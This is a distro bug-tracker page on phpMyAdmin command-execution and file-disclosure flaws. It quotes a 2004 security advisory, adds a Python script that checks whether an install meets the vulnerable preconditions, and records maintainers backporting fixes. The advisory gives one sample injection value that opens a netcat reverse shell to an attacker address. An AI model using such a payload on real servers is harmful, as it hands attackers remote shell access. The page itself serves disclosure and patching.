Bugzilla – Bug 64212
VUL-0: CVE-2004-1148: phpMyAdmin remote command execution
Last modified: 2021-10-04 10:26:44 UTC
We received the following report via full-disclosure. The issue is public.

Date: Mon, 13 Dec 2004 14:02:09 +0100
From: Nicolas Gregoire <ngregoire@exaprobe.com>
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org
Cc:
Subject: [Full-Disclosure] Multiple vulnerabilities in phpMyAdmin

Exaprobe
www.exaprobe.com
Security Advisory

Advisory Name: Multiple vulnerabilities in phpMyAdmin
Release Date: 13 December 2004
Application: phpMyAdmin prior to 2.6.1-rc1
Platform: Any webserver running PHP
Severity: Remote code execution
Author: Nicolas Gregoire <ngregoire@exaprobe.com>
Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html

Overview :
==========
phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges, export data into various formats and is available in 47 languages.

Technical details :
===================
Command execution :
- bug introduced in 2.6.0-pl2
- attacker does *not* need access to the phpMyAdmin interface
- PHP safe mode must be off
- external transformations must be activated
- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :
- attacker needs access to the phpMyAdmin interface
- PHP safe mode must be off
- $cfg['UploadDir'] must be defined
- exploitation is done via 'sql_localfile'

Vendor Response :
=================
After notification by Exaprobe, maintainers of the phpMyAdmin project have released version 2.6.1-rc1 which fixes these two vulnerabilities.

Recommendation :
================
Upgrade to 2.6.1-rc1 or newer. Deactivate uploads and transformations if possible.

CVE Information :
=================
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

CAN-2004-1147 Command execution in phpMyAdmin
CAN-2004-1148 File disclosure in phpMyAdmin
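An added audit helper, written for this bug page and not taken from the advisory, phpMyAdmin or the SUSE packages: it turns the advisory's preconditions for the two candidates into a check a packager can run against an install's version and config.inc.php. It assumes the phpMyAdmin ordering rc < release < pl, takes the "transformations since 2.5" threshold from a later comment in this thread, and uses a constructed config fragment as input.

```python
import re

# Constructed config.inc.php fragment (sample input, not taken from any real install).
SAMPLE_CONFIG = r"""
<?php
$cfg['UploadDir'] = './upload';
$cfg['SaveDir']   = '';
"""

def parse_version(v: str) -> tuple:
    """Make phpMyAdmin version strings comparable as tuples:
    2.5.7 < 2.6.0 < 2.6.0-pl2 < 2.6.1-rc1 < 2.6.1 ('rc' precedes the release, 'pl' follows it)."""
    base, _, suffix = v.partition("-")
    nums = [int(x) for x in base.split(".")]
    nums += [0] * (3 - len(nums))
    if not suffix:
        return (*nums, 0, 0)
    m = re.fullmatch(r"(rc|pl)(\d+)", suffix)
    if m is None:
        raise ValueError(f"unrecognised version suffix in {v!r}")
    stage = -1 if m.group(1) == "rc" else 1
    return (*nums, stage, int(m.group(2)))

FIXED_IN = parse_version("2.6.1-rc1")           # from the advisory
TRANSFORMATIONS_SINCE = parse_version("2.5.0")  # assumption, taken from a later comment in this thread

def upload_dir_configured(config_text: str) -> bool:
    """True when $cfg['UploadDir'] is set to a non-empty value (a file disclosure precondition)."""
    m = re.search(r"\$cfg\['UploadDir'\]\s*=\s*(['\"])(.*?)\1\s*;", config_text)
    return bool(m and m.group(2).strip())

def exposure(version: str, config_text: str, safe_mode_on: bool, transformations_active: bool) -> dict:
    """Evaluate the advisory's preconditions for each candidate on one install."""
    v = parse_version(version)
    unfixed = v < FIXED_IN
    return {
        # command execution: transformations present and active, safe mode off, no login needed
        "CAN-2004-1147": unfixed and v >= TRANSFORMATIONS_SINCE
                         and transformations_active and not safe_mode_on,
        # file disclosure via sql_localfile: UploadDir defined, safe mode off
        "CAN-2004-1148": unfixed and not safe_mode_on and upload_dir_configured(config_text),
    }

if __name__ == "__main__":
    for ver in ("2.4.0", "2.6.0-pl2", "2.6.1-rc1"):
        print(ver, exposure(ver, SAMPLE_CONFIG, safe_mode_on=False, transformations_active=True))
```

With the sample config, a 2.4 install reports only CAN-2004-1148, matching the later observation in this thread that the UploadDir issue is present in the 2.4-based package while the transformation code is not.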
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-4 Should I backport patches or wait for 2.6.1 and update? (I guess updating to a release candidate is not an option.)
Please backport if the effort is sustainable. At least the command execution sounds rather nasty, as it seems to happen before authentication. I can't judge whether the constraints needed to exploit it are fulfilled in practice, though.
It does not happen before authentication. The attacker needs access to the MySQL database.
Okay, I'll port patches.
Anyway, we didn't yet fix: http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-3 Porting that patch will be more complicated, as it touches quite a few places...
I've ported the patches to the version we have in 9.0-9.2; for older ones the code seems to be much changed.
It seems or it in fact is? :-)
The code is completely different there, so that version might not be vulnerable, or the issue is just better hidden :-)
Ok. Can you please submit the packages you can fix then (so we have the diff)? Someone from the security team should have a look at the old versions then.
Okay, I'll check whether they work correctly and submit them.
Submitted fixed packages for 9.0-9.2.
"- bug introduced in 2.6.0-pl2" ... 8.2 has 2.4, so I suspect 8.2 and 8.1 are not affected?
It was not introduced in 2.6.0-pl2, but was in all versions that have transformations (AFAIK 2.5 and newer). However, other issues might also be in older versions.
Any update here?
The uploaddir thing is present in 8.2 but not 8.1, easy. Bits of the XSS patch can be found in 8.2 and 8.1. The big hunk isn't present. I'd suggest fixing the obvious places, taking the risk of missing some places where quoting should have taken place.
Fixed packages for 8.1 and 8.2 submitted.
Created patchinfo file as /work/src/done/PATCHINFO/phpMyAdmin.rKl9hy
Approved fixed packages.
CVE-2004-1148: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)